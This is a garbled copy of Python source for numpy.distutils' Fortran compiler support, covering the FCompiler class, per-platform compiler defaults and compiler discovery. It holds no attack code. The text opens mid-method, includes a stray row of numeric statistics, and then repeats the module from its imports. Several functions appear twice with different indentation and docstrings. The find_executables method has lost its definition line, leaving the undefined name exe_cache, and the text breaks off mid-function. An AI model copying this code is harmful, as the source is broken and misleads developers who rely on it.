output_filename, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None):
objects, output_dir = self._fix_object_args(objects, output_dir)
libraries, library_dirs, runtime_library_dirs = \
self._fix_lib_args(libraries, library_dirs, runtime_library_dirs)
lib_opts = gen_lib_options(self, library_dirs, runtime_library_dirs,
libraries)
if is_string(output_dir):
output_filename = os.path.join(output_dir, output_filename)
elif output_dir is not None:
raise TypeError("'output_dir' must be a string or None")
if self._need_link(objects, output_filename):
if self.library_switch[-1]==' ':
o_args = [self.library_switch.strip(), output_filename]
else:
o_args = [self.library_switch.strip()+output_filename]
if is_string(self.objects):
ld_args = objects + [self.objects]
else:
ld_args = objects + self.objects
ld_args = ld_args + lib_opts + o_args
if debug:
ld_args[:0] = ['-g']
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
if target_desc == CCompiler.EXECUTABLE:
linker = self.linker_exe[:]
else:
linker = self.linker_so[:]
command = linker + ld_args
try:
self.spawn(command)
except DistutilsExecError as e:
msg = str(e)
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def _environment_hook(self, name, hook_name):
if hook_name is None:
return None
if is_string(hook_name):
if hook_name.startswith('self.'):
hook_name = hook_name[5:]
hook = getattr(self, hook_name)
return hook()
elif hook_name.startswith('exe.'):
hook_name = hook_name[4:]
var = self.executables[hook_name]
if var:
return var[0]
else:
return None
elif hook_name.startswith('flags.'):
hook_name = hook_name[6:]
hook = getattr(self, 'get_flags_' + hook_name)
return hook()
else:
return hook_name()
def can_ccompiler_link(self, ccompiler):
"""
Check if the given C compiler can link objects produced by
this compiler.
"""
return True
def wrap_unlinkable_objects(self, objects, output_dir, extra_dll_dir):
"""
Convert a set of object files that are not compatible with the default
linker, to a file that is compatible.
Parameters
----------
objects : list
List of object files to include.
output_dir : str
Output directory to place generated object files.
extra_dll_dir : str
Output directory to place extra DLL files that need to be
included on Windows.
Returns
-------
converted_objects : list of str
List of converted object files.
Note that the number of output files is not necessarily
the same as inputs.
"""
raise NotImplementedError()
## class FCompiler
_default_compilers = (
# sys.platform mappings
('win32', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95',
'intelvem', 'intelem', 'flang')),
('cygwin.*', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95')),
('linux.*', ('gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq',
'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor')),
('darwin.*', ('gnu95', 'nag', 'absoft', 'ibm', 'intel', 'gnu', 'g95', 'pg')),
('sunos.*', ('sun', 'gnu', 'gnu95', 'g95')),
('irix.*', ('mips', 'gnu', 'gnu95',)),
('aix.*', ('ibm', 'gnu', 'gnu95',)),
# os.name mappings
('posix', ('gnu', 'gnu95',)),
('nt', ('gnu', 'gnu95',)),
('mac', ('gnu95', 'gnu', 'pg')),
)
fcompiler_class = None
fcompiler_aliases = None
def load_all_fcompiler_classes():
"""Cache all the FCompiler classes found in modules in the
numpy.distutils.fcompiler package.
"""
from glob import glob
global fcompiler_class, fcompiler_aliases
if fcompiler_class is not None:
return
pys = os.path.join(os.path.dirname(__file__), '*.py')
fcompiler_class = {}
fcompiler_aliases = {}
for fname in glob(pys):
module_name, ext = os.path.splitext(os.path.basename(fname))
module_name = 'numpy.distutils.fcompiler.' + module_name
__import__ (module_name)
module = sys.modules[module_name]
if hasattr(module, 'compilers'):
for cname in module.compilers:
klass = getattr(module, cname)
desc = (klass.compiler_type, klass, klass.description)
fcompiler_class[klass.compiler_type] = desc
for alias in klass.compiler_aliases:
if alias in fcompiler_aliases:
raise ValueError("alias %r defined for both %s and %s"
% (alias, klass.__name__,
fcompiler_aliases[alias][1].__name__))
fcompiler_aliases[alias] = desc
def _find_existing_fcompiler(compiler_types,
osname=None, platform=None,
requiref90=False,
c_compiler=None):
from numpy.distutils.core import get_distribution
dist = get_distribution(always=True)
for compiler_type in compiler_types:
v = None
try:
c = new_fcompiler(plat=platform, compiler=compiler_type,
c_compiler=c_compiler)
c.customize(dist)
v = c.get_version()
if requiref90 and c.compiler_f90 is None:
v = None
new_compiler = c.suggested_f90_compiler
if new_compiler:
log.warn('Trying %r compiler as suggested by %r '
'compiler for f90 support.' % (compiler_type,
new_compiler))
c = new_fcompiler(plat=platform, compiler=new_compiler,
c_compiler=c_compiler)
c.customize(dist)
v = c.get_version()
if v is not None:
compiler_type = new_compiler
if requiref90 and c.compiler_f90 is None:
raise ValueError('%s does not support compiling f90 codes, '
'skipping.' % (c.__class__.__name__))
except DistutilsModuleError:
log.debug("_find_existing_fcompiler: compiler_type='%s' raised DistutilsModuleError", compiler_type)
except CompilerNotFound:
log.debug("_find_existing_fcompiler: compiler_type='%s' not found", compiler_type)
if v is not None:
return compiler_type
return None
def available_fcompilers_for_platform(osname=None, platform=None):
if osname is None:
osname = os.name
if platform is None:
platform = sys.platform
matching_compiler_types = []
for pattern, compiler_type in _default_compilers:
if re.match(pattern, platform) or re.match(pattern, osname):
for ct in compiler_type:
if ct not in matching_compiler_types:
matching_compiler_types.append(ct)
if not matching_compiler_types:
matching_compiler_types.append('gnu')
return matching_compiler_types
def get_default_fcompiler(osname=None, platform=None, requiref90=False,
c_compiler=None):
"""Determine the default Fortran compiler to use for the given
platform."""
matching_compiler_types = available_fcompilers_for_platform(osname,
platform)
log.info("get_default_fcompiler: matching types: '%s'",
matching_compiler_types)
compiler_type = _find_existing_fcompiler(matching_compiler_types,
osname=osname,
platform=platform,
requiref90=requiref90,
c_compiler=c_compiler)
return compiler_type
# Flag to avoid rechecking for Fortran compiler every time
failed_fcompilers = set()
def new_fcompiler(plat=None,
compiler=None,
verbose=0,
dry_run=0,
force=0,
requiref90=False,
c_compiler = None):
"""Generate an instance of some FCompiler subclass for the supplied
platform/compiler combination.
"""
global failed_fcompilers
fcompiler_key = (plat, compiler)
if fcompiler_key in failed_fcompilers:
return None
load_all_fcompiler_classes()
if plat is None:
plat = os.name
if compiler is None:
compiler = get_default_fcompiler(plat, requiref90=requiref90,
c_compiler=c_compiler)
if compiler in fcompiler_class:
module_name, klass, long_description = fcompiler_class[compiler]
elif compiler in fcompiler_aliases:
module_name, klass, long_description = fcompiler_aliases[compiler]
else:
msg = "don't know how to compile Fortran code on platform '%s'" % plat
if compiler is not None:
msg = msg + " with '%s' compiler." % compiler
msg = msg + " Supported compilers are: %s)" \
% (','.join(fcompiler_class.keys()))
log.warn(msg)
failed_fcompilers.add(fcompiler_key)
return None
compiler = klass(verbose=verbose, dry_run=dry_run, force=force)
compiler.c_compiler = c_compiler
return compiler
def show_fcompilers(dist=None):
"""Print list of available compilers (used by the "--help-fcompiler"
option to "config_fc").
"""
if dist is None:
from distutils.dist import Distribution
from numpy.distutils.command.config_compiler import config_fc
dist = Distribution()
dist.script_name = os.path.basename(sys.argv[0])
dist.script_args = ['config_fc'] + sys.argv[1:]
try:
dist.script_args.remove('--help-fcompiler')
except ValueError:
pass
dist.cmdclass['config_fc'] = config_fc
dist.parse_config_files()
dist.parse_command_line()
compilers = []
compilers_na = []
compilers_ni = []
if not fcompiler_class:
load_all_fcompiler_classes()
platform_compilers = available_fcompilers_for_platform()
for compiler in platform_compilers:
v = None
log.set_verbosity(-2)
try:
c = new_fcompiler(compiler=compiler, verbose=dist.verbose)
c.customize(dist)
v = c.get_version()
except (DistutilsModuleError, CompilerNotFound) as e:
log.debug("show_fcompilers: %s not found" % (compiler,))
log.debug(repr(e))
if v is None:
compilers_na.append(("fcompiler="+compiler, None,
fcompiler_class[compiler][2]))
else:
c.dump_properties()
compilers.append(("fcompiler="+compiler, None,
fcompiler_class[compiler][2] + ' (%s)' % v))
compilers_ni = list(set(fcompiler_class.keys()) - set(platform_compilers))
compilers_ni = [("fcompiler="+fc, None, fcompiler_class[fc][2])
for fc in compilers_ni]
compilers.sort()
compilers_na.sort()
compilers_ni.sort()
pretty_printer = FancyGetopt(compilers)
pretty_printer.print_help("Fortran compilers found:")
pretty_printer = FancyGetopt(compilers_na)
pretty_printer.print_help("Compilers available for this "
"platform, but not found:")
if compilers_ni:
pretty_printer = FancyGetopt(compilers_ni)
pretty_printer.print_help("Compilers not available on this platform:")
print("For compiler details, run 'config_fc --verbose' setup command.")
def dummy_fortran_file():
fo, name = make_temp_file(suffix='.f')
fo.write(" subroutine dummy()\n end\n")
fo.close()
return name[:-2]
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*!]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
"""Check if file is in free format Fortran."""
# f90 allows both fixed and free format, assuming fixed unless
# signs of free format are detected.
result = 0
f = open_latin1(file, 'r')
line = f.readline()
n = 10000 # the number of non-comment lines to scan for hints
if _has_f_header(line):
n = 0
elif _has_f90_header(line):
n = 0
result = 1
while n>0 and line:
line = line.rstrip()
if line and line[0]!='!':
n -= 1
if (line[0]!='\t' and _free_f90_start(line[:5])) or line[-1:]=='&':
result = 1
break
line = f.readline()
f.close()
return result
def has_f90_header(src):
f = open_latin1(src, 'r')
line = f.readline()
f.close()
return _has_f90_header(line) or _has_fix_header(line)
_f77flags_re = re.compile(r'(c|)f77flags\s*\(\s*(?P<fcname>\w+)\s*\)\s*=\s*(?P<fflags>.*)', re.I)
def get_f77flags(src):
"""
Search the first 20 lines of fortran 77 code for line pattern
`CF77FLAGS(<fcompiler type>)=<f77 flags>`
Return a dictionary {<fcompiler type>:<f77 flags>}.
"""
flags = {}
f = open_latin1(src, 'r')
i = 0
for line in f:
i += 1
if i>20: break
m = _f77flags_re.match(line)
if not m: continue
fcname = m.group('fcname').strip()
fflags = m.group('fflags').strip()
flags[fcname] = split_quoted(fflags)
f.close()
return flags
# TODO: implement get_f90flags and use it in _compile similarly to get_f77flags
if __name__ == '__main__':
show_fcompilers()
| 38.894942 | 112 | 0.595538 | __all__ = ['FCompiler', 'new_fcompiler', 'show_fcompilers',
'dummy_fortran_file']
import os
import sys
import re
from numpy.compat import open_latin1
from distutils.sysconfig import get_python_lib
from distutils.fancy_getopt import FancyGetopt
from distutils.errors import DistutilsModuleError, \
DistutilsExecError, CompileError, LinkError, DistutilsPlatformError
from distutils.util import split_quoted, strtobool
from numpy.distutils.ccompiler import CCompiler, gen_lib_options
from numpy.distutils import log
from numpy.distutils.misc_util import is_string, all_strings, is_sequence, \
make_temp_file, get_shared_lib_extension
from numpy.distutils.exec_command import find_executable
from numpy.distutils import _shell_utils
from .environment import EnvironmentConfig
__metaclass__ = type
class CompilerNotFound(Exception):
pass
def flaglist(s):
if is_string(s):
return split_quoted(s)
else:
return s
def str2bool(s):
if is_string(s):
return strtobool(s)
return bool(s)
def is_sequence_of_strings(seq):
return is_sequence(seq) and all_strings(seq)
class FCompiler(CCompiler):
distutils_vars = EnvironmentConfig(
distutils_section='config_fc',
noopt = (None, None, 'noopt', str2bool, False),
noarch = (None, None, 'noarch', str2bool, False),
debug = (None, None, 'debug', str2bool, False),
verbose = (None, None, 'verbose', str2bool, False),
)
command_vars = EnvironmentConfig(
distutils_section='config_fc',
compiler_f77 = ('exe.compiler_f77', 'F77', 'f77exec', None, False),
compiler_f90 = ('exe.compiler_f90', 'F90', 'f90exec', None, False),
compiler_fix = ('exe.compiler_fix', 'F90', 'f90exec', None, False),
version_cmd = ('exe.version_cmd', None, None, None, False),
linker_so = ('exe.linker_so', 'LDSHARED', 'ldshared', None, False),
linker_exe = ('exe.linker_exe', 'LD', 'ld', None, False),
archiver = (None, 'AR', 'ar', None, False),
ranlib = (None, 'RANLIB', 'ranlib', None, False),
)
flag_vars = EnvironmentConfig(
distutils_section='config_fc',
f77 = ('flags.f77', 'F77FLAGS', 'f77flags', flaglist, True),
f90 = ('flags.f90', 'F90FLAGS', 'f90flags', flaglist, True),
free = ('flags.free', 'FREEFLAGS', 'freeflags', flaglist, True),
fix = ('flags.fix', None, None, flaglist, False),
opt = ('flags.opt', 'FOPT', 'opt', flaglist, True),
opt_f77 = ('flags.opt_f77', None, None, flaglist, False),
opt_f90 = ('flags.opt_f90', None, None, flaglist, False),
arch = ('flags.arch', 'FARCH', 'arch', flaglist, False),
arch_f77 = ('flags.arch_f77', None, None, flaglist, False),
arch_f90 = ('flags.arch_f90', None, None, flaglist, False),
debug = ('flags.debug', 'FDEBUG', 'fdebug', flaglist, True),
debug_f77 = ('flags.debug_f77', None, None, flaglist, False),
debug_f90 = ('flags.debug_f90', None, None, flaglist, False),
flags = ('self.get_flags', 'FFLAGS', 'fflags', flaglist, True),
linker_so = ('flags.linker_so', 'LDFLAGS', 'ldflags', flaglist, True),
linker_exe = ('flags.linker_exe', 'LDFLAGS', 'ldflags', flaglist, True),
ar = ('flags.ar', 'ARFLAGS', 'arflags', flaglist, True),
)
language_map = {'.f': 'f77',
'.for': 'f77',
'.F': 'f77',
'.ftn': 'f77',
'.f77': 'f77',
'.f90': 'f90',
'.F90': 'f90',
'.f95': 'f90',
}
language_order = ['f90', 'f77']
compiler_type = None
compiler_aliases = ()
version_pattern = None
possible_executables = []
executables = {
'version_cmd': ["f77", "-v"],
'compiler_f77': ["f77"],
'compiler_f90': ["f90"],
'compiler_fix': ["f90", "-fixed"],
'linker_so': ["f90", "-shared"],
'linker_exe': ["f90"],
'archiver': ["ar", "-cr"],
'ranlib': None,
}
suggested_f90_compiler = None
compile_switch = "-c"
object_switch = "-o "
library_switch = "-o "
module_dir_switch = None
module_include_switch = '-I'
pic_flags = []
src_extensions = ['.for', '.ftn', '.f77', '.f', '.f90', '.f95', '.F', '.F90', '.FOR']
obj_extension = ".o"
shared_lib_extension = get_shared_lib_extension()
static_lib_extension = ".a"
static_lib_format = "lib%s%s"
shared_lib_format = "%s%s"
exe_extension = ""
_exe_cache = {}
_executable_keys = ['version_cmd', 'compiler_f77', 'compiler_f90',
'compiler_fix', 'linker_so', 'linker_exe', 'archiver',
'ranlib']
c_compiler = None
extra_f77_compile_args = []
extra_f90_compile_args = []
def __init__(self, *args, **kw):
CCompiler.__init__(self, *args, **kw)
self.distutils_vars = self.distutils_vars.clone(self._environment_hook)
self.command_vars = self.command_vars.clone(self._environment_hook)
self.flag_vars = self.flag_vars.clone(self._environment_hook)
self.executables = self.executables.copy()
for e in self._executable_keys:
if e not in self.executables:
self.executables[e] = None
self._is_customised = False
def __copy__(self):
obj = self.__new__(self.__class__)
obj.__dict__.update(self.__dict__)
obj.distutils_vars = obj.distutils_vars.clone(obj._environment_hook)
obj.command_vars = obj.command_vars.clone(obj._environment_hook)
obj.flag_vars = obj.flag_vars.clone(obj._environment_hook)
obj.executables = obj.executables.copy()
return obj
def copy(self):
return self.__copy__()
# Use properties for the attributes used by CCompiler. Setting them
# as attributes from the self.executables dictionary is error-prone,
# so we get them from there each time.
def _command_property(key):
def fget(self):
assert self._is_customised
return self.executables[key]
return property(fget=fget)
version_cmd = _command_property('version_cmd')
compiler_f77 = _command_property('compiler_f77')
compiler_f90 = _command_property('compiler_f90')
compiler_fix = _command_property('compiler_fix')
linker_so = _command_property('linker_so')
linker_exe = _command_property('linker_exe')
archiver = _command_property('archiver')
ranlib = _command_property('ranlib')
# Make our terminology consistent.
def set_executable(self, key, value):
self.set_command(key, value)
def set_commands(self, **kw):
for k, v in kw.items():
self.set_command(k, v)
def set_command(self, key, value):
if not key in self._executable_keys:
raise ValueError(
"unknown executable '%s' for class %s" %
(key, self.__class__.__name__))
if is_string(value):
value = split_quoted(value)
assert value is None or is_sequence_of_strings(value[1:]), (key, value)
self.executables[key] = value
######################################################################
## Methods that subclasses may redefine. But don't call these methods!
def cached_find_executable(exe):
if exe in exe_cache:
return exe_cache[exe]
fc_exe = find_executable(exe)
exe_cache[exe] = exe_cache[fc_exe] = fc_exe
return fc_exe
def verify_command_form(name, value):
if value is not None and not is_sequence_of_strings(value):
raise ValueError(
"%s value %r is invalid in class %s" %
(name, value, self.__class__.__name__))
def set_exe(exe_key, f77=None, f90=None):
cmd = self.executables.get(exe_key, None)
if not cmd:
return None
# have anything set
exe_from_environ = getattr(self.command_vars, exe_key)
if not exe_from_environ:
possibles = [f90, f77] + self.possible_executables
else:
possibles = [exe_from_environ] + self.possible_executables
seen = set()
unique_possibles = []
for e in possibles:
if e == '<F77>':
e = f77
elif e == '<F90>':
e = f90
if not e or e in seen:
continue
seen.add(e)
unique_possibles.append(e)
for exe in unique_possibles:
fc_exe = cached_find_executable(exe)
if fc_exe:
cmd[0] = fc_exe
return fc_exe
self.set_command(exe_key, None)
return None
ctype = self.compiler_type
f90 = set_exe('compiler_f90')
if not f90:
f77 = set_exe('compiler_f77')
if f77:
log.warn('%s: no Fortran 90 compiler found' % ctype)
else:
raise CompilerNotFound('%s: f90 nor f77' % ctype)
else:
f77 = set_exe('compiler_f77', f90=f90)
if not f77:
log.warn('%s: no Fortran 77 compiler found' % ctype)
set_exe('compiler_fix', f90=f90)
set_exe('linker_so', f77=f77, f90=f90)
set_exe('linker_exe', f77=f77, f90=f90)
set_exe('version_cmd', f77=f77, f90=f90)
set_exe('archiver')
set_exe('ranlib')
def update_executables(self):
pass
def get_flags(self):
return [] + self.pic_flags
def _get_command_flags(self, key):
cmd = self.executables.get(key, None)
if cmd is None:
return []
return cmd[1:]
def get_flags_f77(self):
return self._get_command_flags('compiler_f77')
def get_flags_f90(self):
return self._get_command_flags('compiler_f90')
def get_flags_free(self):
return []
def get_flags_fix(self):
return self._get_command_flags('compiler_fix')
def get_flags_linker_so(self):
return self._get_command_flags('linker_so')
def get_flags_linker_exe(self):
return self._get_command_flags('linker_exe')
def get_flags_ar(self):
return self._get_command_flags('archiver')
def get_flags_opt(self):
return []
def get_flags_arch(self):
return []
def get_flags_debug(self):
return []
get_flags_opt_f77 = get_flags_opt_f90 = get_flags_opt
get_flags_arch_f77 = get_flags_arch_f90 = get_flags_arch
get_flags_debug_f77 = get_flags_debug_f90 = get_flags_debug
def get_libraries(self):
return self.libraries[:]
def get_library_dirs(self):
return self.library_dirs[:]
def get_version(self, force=False, ok_status=[0]):
assert self._is_customised
version = CCompiler.get_version(self, force=force, ok_status=ok_status)
if version is None:
raise CompilerNotFound()
return version
############################################################
## Public methods:
def customize(self, dist = None):
log.info('customize %s' % (self.__class__.__name__))
self._is_customised = True
self.distutils_vars.use_distribution(dist)
self.command_vars.use_distribution(dist)
self.flag_vars.use_distribution(dist)
self.update_executables()
# find_executables takes care of setting the compiler commands,
# version_cmd, linker_so, linker_exe, ar, and ranlib
self.find_executables()
noopt = self.distutils_vars.get('noopt', False)
noarch = self.distutils_vars.get('noarch', noopt)
debug = self.distutils_vars.get('debug', False)
f77 = self.command_vars.compiler_f77
f90 = self.command_vars.compiler_f90
f77flags = []
f90flags = []
freeflags = []
fixflags = []
if f77:
f77 = _shell_utils.NativeParser.split(f77)
f77flags = self.flag_vars.f77
if f90:
f90 = _shell_utils.NativeParser.split(f90)
f90flags = self.flag_vars.f90
freeflags = self.flag_vars.free
# XXX Assuming that free format is default for f90 compiler.
fix = self.command_vars.compiler_fix
# NOTE: this and similar examples are probably just
# excluding --coverage flag when F90 = gfortran --coverage
# instead of putting that flag somewhere more appropriate
# this and similar examples where a Fortran compiler
# environment variable has been customized by CI or a user
# should perhaps eventually be more thoroughly tested and more
# robustly handled
if fix:
fix = _shell_utils.NativeParser.split(fix)
fixflags = self.flag_vars.fix + f90flags
oflags, aflags, dflags = [], [], []
# examine get_flags_<tag>_<compiler> for extra flags
# only add them if the method is different from get_flags_<tag>
def get_flags(tag, flags):
# note that self.flag_vars.<tag> calls self.get_flags_<tag>()
flags.extend(getattr(self.flag_vars, tag))
this_get = getattr(self, 'get_flags_' + tag)
for name, c, flagvar in [('f77', f77, f77flags),
('f90', f90, f90flags),
('f90', fix, fixflags)]:
t = '%s_%s' % (tag, name)
if c and this_get is not getattr(self, 'get_flags_' + t):
flagvar.extend(getattr(self.flag_vars, t))
if not noopt:
get_flags('opt', oflags)
if not noarch:
get_flags('arch', aflags)
if debug:
get_flags('debug', dflags)
fflags = self.flag_vars.flags + dflags + oflags + aflags
if f77:
self.set_commands(compiler_f77=f77+f77flags+fflags)
if f90:
self.set_commands(compiler_f90=f90+freeflags+f90flags+fflags)
if fix:
self.set_commands(compiler_fix=fix+fixflags+fflags)
#XXX: Do we need LDSHARED->SOSHARED, LDFLAGS->SOFLAGS
linker_so = self.linker_so
if linker_so:
linker_so_flags = self.flag_vars.linker_so
if sys.platform.startswith('aix'):
python_lib = get_python_lib(standard_lib=1)
ld_so_aix = os.path.join(python_lib, 'config', 'ld_so_aix')
python_exp = os.path.join(python_lib, 'config', 'python.exp')
linker_so = [ld_so_aix] + linker_so + ['-bI:'+python_exp]
self.set_commands(linker_so=linker_so+linker_so_flags)
linker_exe = self.linker_exe
if linker_exe:
linker_exe_flags = self.flag_vars.linker_exe
self.set_commands(linker_exe=linker_exe+linker_exe_flags)
ar = self.command_vars.archiver
if ar:
arflags = self.flag_vars.ar
self.set_commands(archiver=[ar]+arflags)
self.set_library_dirs(self.get_library_dirs())
self.set_libraries(self.get_libraries())
def dump_properties(self):
props = []
for key in list(self.executables.keys()) + \
['version', 'libraries', 'library_dirs',
'object_switch', 'compile_switch']:
if hasattr(self, key):
v = getattr(self, key)
props.append((key, None, '= '+repr(v)))
props.sort()
pretty_printer = FancyGetopt(props)
for l in pretty_printer.generate_help("%s instance properties:" \
% (self.__class__.__name__)):
if l[:4]==' --':
l = ' ' + l[4:]
print(l)
###################
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
src_flags = {}
if is_f_file(src) and not has_f90_header(src):
flavor = ':f77'
compiler = self.compiler_f77
src_flags = get_f77flags(src)
extra_compile_args = self.extra_f77_compile_args or []
elif is_free_format(src):
flavor = ':f90'
compiler = self.compiler_f90
if compiler is None:
raise DistutilsExecError('f90 not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
else:
flavor = ':fix'
compiler = self.compiler_fix
if compiler is None:
raise DistutilsExecError('f90 (fixed) not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
if self.object_switch[-1]==' ':
o_args = [self.object_switch.strip(), obj]
else:
o_args = [self.object_switch.strip()+obj]
assert self.compile_switch.strip()
s_args = [self.compile_switch, src]
if extra_compile_args:
log.info('extra %s options: %r' \
% (flavor[1:], ' '.join(extra_compile_args)))
extra_flags = src_flags.get(self.compiler_type, [])
if extra_flags:
log.info('using compile options from source: %r' \
% ' '.join(extra_flags))
command = compiler + cc_args + extra_flags + s_args + o_args \
+ extra_postargs + extra_compile_args
display = '%s: %s' % (os.path.basename(compiler[0]) + flavor,
src)
try:
self.spawn(command, display=display)
except DistutilsExecError as e:
msg = str(e)
raise CompileError(msg)
def module_options(self, module_dirs, module_build_dir):
options = []
if self.module_dir_switch is not None:
if self.module_dir_switch[-1]==' ':
options.extend([self.module_dir_switch.strip(), module_build_dir])
else:
options.append(self.module_dir_switch.strip()+module_build_dir)
else:
print('XXX: module_build_dir=%r option ignored' % (module_build_dir))
print('XXX: Fix module_dir_switch for ', self.__class__.__name__)
if self.module_include_switch is not None:
for d in [module_build_dir]+module_dirs:
options.append('%s%s' % (self.module_include_switch, d))
else:
print('XXX: module_dirs=%r option ignored' % (module_dirs))
print('XXX: Fix module_include_switch for ', self.__class__.__name__)
return options
def library_option(self, lib):
return "-l" + lib
def library_dir_option(self, dir):
return "-L" + dir
    def link(self, target_desc, objects,
             output_filename, output_dir=None, libraries=None,
             library_dirs=None, runtime_library_dirs=None,
             export_symbols=None, debug=0, extra_preargs=None,
             extra_postargs=None, build_temp=None, target_lang=None):
        """Link ``objects`` into ``output_filename`` with the Fortran linker.

        Mirrors distutils' ``CCompiler.link`` interface: ``target_desc``
        selects executable versus shared-object linking, and the keyword
        arguments extend the library search paths and linker command line.

        :raises TypeError: if ``output_dir`` is neither a string nor None.
        :raises LinkError: if the spawned linker command fails.
        """
        objects, output_dir = self._fix_object_args(objects, output_dir)
        libraries, library_dirs, runtime_library_dirs = \
            self._fix_lib_args(libraries, library_dirs, runtime_library_dirs)
        lib_opts = gen_lib_options(self, library_dirs, runtime_library_dirs,
                                   libraries)
        if is_string(output_dir):
            output_filename = os.path.join(output_dir, output_filename)
        elif output_dir is not None:
            raise TypeError("'output_dir' must be a string or None")
        # Only relink when an object file is newer than the existing output.
        if self._need_link(objects, output_filename):
            # A trailing space in the switch means the switch and its value
            # are two separate command-line arguments.
            if self.library_switch[-1]==' ':
                o_args = [self.library_switch.strip(), output_filename]
            else:
                o_args = [self.library_switch.strip()+output_filename]
            # self.objects holds extra objects every link must include.
            if is_string(self.objects):
                ld_args = objects + [self.objects]
            else:
                ld_args = objects + self.objects
            ld_args = ld_args + lib_opts + o_args
            if debug:
                ld_args[:0] = ['-g']
            if extra_preargs:
                ld_args[:0] = extra_preargs
            if extra_postargs:
                ld_args.extend(extra_postargs)
            self.mkpath(os.path.dirname(output_filename))
            # Copy the linker list so later mutation cannot affect the
            # class-level configuration.
            if target_desc == CCompiler.EXECUTABLE:
                linker = self.linker_exe[:]
            else:
                linker = self.linker_so[:]
            command = linker + ld_args
            try:
                self.spawn(command)
            except DistutilsExecError as e:
                # Re-raise as the distutils-standard LinkError.
                msg = str(e)
                raise LinkError(msg)
        else:
            log.debug("skipping %s (up-to-date)", output_filename)
def _environment_hook(self, name, hook_name):
if hook_name is None:
return None
if is_string(hook_name):
if hook_name.startswith('self.'):
hook_name = hook_name[5:]
hook = getattr(self, hook_name)
return hook()
elif hook_name.startswith('exe.'):
hook_name = hook_name[4:]
var = self.executables[hook_name]
if var:
return var[0]
else:
return None
elif hook_name.startswith('flags.'):
hook_name = hook_name[6:]
hook = getattr(self, 'get_flags_' + hook_name)
return hook()
else:
return hook_name()
def can_ccompiler_link(self, ccompiler):
return True
    def wrap_unlinkable_objects(self, objects, output_dir, extra_dll_dir):
        """Convert *objects* that the C compiler cannot link into a linkable
        form.

        Subclasses whose :meth:`can_ccompiler_link` may return False must
        override this; the base implementation is abstract.
        """
        raise NotImplementedError()
## class FCompiler
# Ordered compiler-type preferences per platform.  Each entry maps a regular
# expression (matched against sys.platform and then os.name) to a tuple of
# compiler_type names tried in order.
_default_compilers = (
    # sys.platform mappings
    ('win32', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95',
               'intelvem', 'intelem', 'flang')),
    ('cygwin.*', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95')),
    ('linux.*', ('gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq',
                 'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor')),
    ('darwin.*', ('gnu95', 'nag', 'absoft', 'ibm', 'intel', 'gnu', 'g95', 'pg')),
    ('sunos.*', ('sun', 'gnu', 'gnu95', 'g95')),
    ('irix.*', ('mips', 'gnu', 'gnu95',)),
    ('aix.*', ('ibm', 'gnu', 'gnu95',)),
    # os.name mappings
    ('posix', ('gnu', 'gnu95',)),
    ('nt', ('gnu', 'gnu95',)),
    ('mac', ('gnu95', 'gnu', 'pg')),
    )
# Cache mapping compiler_type -> (compiler_type, class, description),
# populated lazily by load_all_fcompiler_classes(); None until first use.
fcompiler_class = None
# Cache mapping alias names to the same descriptor tuples.
fcompiler_aliases = None
def load_all_fcompiler_classes():
    """Import every module in this package and register the FCompiler
    classes each advertises through a module-level ``compilers`` list.

    Results are cached in the ``fcompiler_class`` and ``fcompiler_aliases``
    module globals; subsequent calls are no-ops.

    :raises ValueError: if two compiler classes declare the same alias.
    """
    from glob import glob
    global fcompiler_class, fcompiler_aliases
    if fcompiler_class is not None:
        return  # already loaded
    fcompiler_class = {}
    fcompiler_aliases = {}
    pattern = os.path.join(os.path.dirname(__file__), '*.py')
    for fname in glob(pattern):
        base, _ext = os.path.splitext(os.path.basename(fname))
        module_name = 'numpy.distutils.fcompiler.' + base
        __import__(module_name)
        module = sys.modules[module_name]
        if not hasattr(module, 'compilers'):
            continue
        for cname in module.compilers:
            klass = getattr(module, cname)
            desc = (klass.compiler_type, klass, klass.description)
            fcompiler_class[klass.compiler_type] = desc
            for alias in klass.compiler_aliases:
                if alias in fcompiler_aliases:
                    raise ValueError("alias %r defined for both %s and %s"
                                     % (alias, klass.__name__,
                                        fcompiler_aliases[alias][1].__name__))
                fcompiler_aliases[alias] = desc
def _find_existing_fcompiler(compiler_types,
                             osname=None, platform=None,
                             requiref90=False,
                             c_compiler=None):
    """Return the first type in ``compiler_types`` whose compiler is
    actually installed (its version can be queried), or None.

    When ``requiref90`` is true and a working candidate lacks f90 support,
    the compiler it suggests for f90 is probed in its place.
    """
    from numpy.distutils.core import get_distribution
    dist = get_distribution(always=True)
    for compiler_type in compiler_types:
        v = None
        try:
            c = new_fcompiler(plat=platform, compiler=compiler_type,
                              c_compiler=c_compiler)
            c.customize(dist)
            # A retrievable version is our evidence the compiler exists.
            v = c.get_version()
            if requiref90 and c.compiler_f90 is None:
                v = None
                # Candidate works but cannot do f90: try the compiler it
                # recommends for f90 support instead.
                new_compiler = c.suggested_f90_compiler
                if new_compiler:
                    log.warn('Trying %r compiler as suggested by %r '
                             'compiler for f90 support.' % (compiler_type,
                                                            new_compiler))
